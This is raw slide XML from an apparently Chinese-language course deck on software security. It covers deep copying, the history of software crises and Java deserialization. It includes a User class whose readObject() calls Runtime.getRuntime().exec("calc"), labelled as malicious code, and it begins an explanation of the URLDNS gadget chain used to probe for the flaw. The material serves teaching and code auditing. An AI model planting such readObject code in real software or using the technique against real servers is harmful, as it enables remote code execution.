              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拷贝：创建一个新对象，并递归地复制原对象的所有属性，包括引用类型属性，确保新对象和原对象之间完全独立。修改新对象的属性不会影响原对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浅拷贝只是增加了一个指针指向已存在的内存地址，而深</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拷贝是增加了一个指针并且申请了一个新的内存，使这个增加的指针指向这个新的内存。深拷贝是指源对象与拷贝对象互相独立，其中任何一个对象的改动都不会对另外一个对象造成影响。使用深拷贝的情况下，释放内存的时候不会因为出现浅拷贝时释放同一个内存的错误。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135620" y="4573270"/>
            <a:ext cx="3528060" cy="1626870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269875" y="4791710"/>
            <a:ext cx="7698740" cy="1626235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Java 的序列化被视为深拷贝，当你将一个对象进行序列化时，整个对象的状态（包括其私有属性）都会被转储到字节流中；反序列化后，得到的是一个全新的对象，且所有的引用类型属性也会被复制，而不是直接指向原对象，从而确保序列化和反序列化后得到的对象相互独立。</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软件安全重要性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件危机</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017270" y="1726565"/>
            <a:ext cx="9039225" cy="3830955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第一次“软件危机”-20世纪60年代</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根源：日益庞大和复杂的程序对开发管理的要求越来越高。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解决：软件工程。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二次“软件危机”-20世纪80年代</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根源：软件规模继续扩大，程序数百万行，数百人时开发，可维护性难</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解决：面向对象语言-C++/java/c#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第三次“软件危机”-21世纪头十年</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根源：软件安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解决：软件安全开发生命周期管理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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270510" y="1195070"/>
            <a:ext cx="11306175" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何控制对象的反序列化行为呢？比如在反序列化过程中初始化某些东西</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其实想要实现上述需求只需要在控制的对象中重写readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即可。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>class User implements Serializable{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private String name;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private transient int age;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private float height;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    public User(String name, int age, float height) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.name = name;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.age = age;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.height = height;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    public void info(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        System.out.println("Name: "+name+", Age: "+age+", Height: "+height);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>     private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>         input.defaultReadObject();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>         System.out.println("Hello");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>     }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>}</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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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549910" y="1565910"/>
            <a:ext cx="8848725" cy="2000250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3625850"/>
            <a:ext cx="8248650" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5084445" y="4973320"/>
            <a:ext cx="6707505" cy="1657985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549910" y="1183005"/>
            <a:ext cx="11027410" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>源码分析：实际上就是如果重写了readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之后就会通过反射的方式在反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="4770120"/>
            <a:ext cx="4686300" cy="1303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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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270510" y="1195070"/>
            <a:ext cx="11306175" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>知道了执行时机以及执行方式，如果利用此方式执行恶意代码呢？其实反序列化引发的安全问题的根本点就在这里，本来是一种很好的解决方案结果却被很多Hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>class User implements Serializable{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private String name;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private transient int age;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    private float height;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    public User(String name, int age, float height) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.name = name;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.age = age;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        this.height = height;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    public void info(){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        System.out.println("Name: "+name+", Age: "+age+", Height: "+height);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>     private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>         input.defaultReadObject();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t> Runtime.getRuntime().exec("calc");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1"/>
              <a:t>  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1"/>
              <a:t>恶意代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>     }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>}</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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456565" y="2937510"/>
            <a:ext cx="5057775" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:t>源码</a:t>
            </a:r>
            <a:r>
              <a:t>分析</a:t>
            </a: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54940" y="1195070"/>
            <a:ext cx="11421745" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URLDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>链</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URLDNS这条链，并不能用来执行其他命令来RCE，只能用来发送一次DNS请求到我们指定的网站上，然后我们就能查看是否有请求记录而来判断是否存在Java的反序列化漏洞。简短的来说：URLDNS只能用来探测和验证是否存在漏洞。看似没什么用，但其实在渗透测试的实战中，这种用DNS请求来探测和验证漏洞的点到为止的思想还是挺常用的。而且这个Gadget还不需要任何其他的依赖，原生Java就能够成功调用成功。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目的：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为突破点在反序列化时触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询。</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7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205105" y="1185545"/>
            <a:ext cx="11371580" cy="965200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的入口类重写readObject方法，并且入口类可以为任意对象，也就是通过上述的特征可以被反序列化利用。也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HashMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>整合了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类实现了反序列化的攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检测：</a:t>
            </a:r>
